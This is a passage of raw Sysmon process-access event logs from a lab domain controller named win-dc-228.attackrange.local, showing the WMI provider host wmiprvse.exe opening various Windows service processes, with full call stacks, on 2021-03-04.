7d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204122Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-3100-00000000AD01}2400C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204121Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204120Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2F00-00000000AD01}2420C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204119Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204118Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2D00-00000000AD01}2308C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204117Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204116Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2B00-00000000AD01}2540C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204115Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204114Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2700-00000000AD01}3004C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204113Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8439-603E-2500-00000000AD01}2856C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204112Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8430-603E-1800-00000000AD01}1928C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204111Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1700-00000000AD01}1452C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204110Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204109Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204108Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1400-00000000AD01}1096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204107Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1300-00000000AD01}896C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204106Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1200-00000000AD01}392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204105Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204104Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1000-00000000AD01}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204103Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4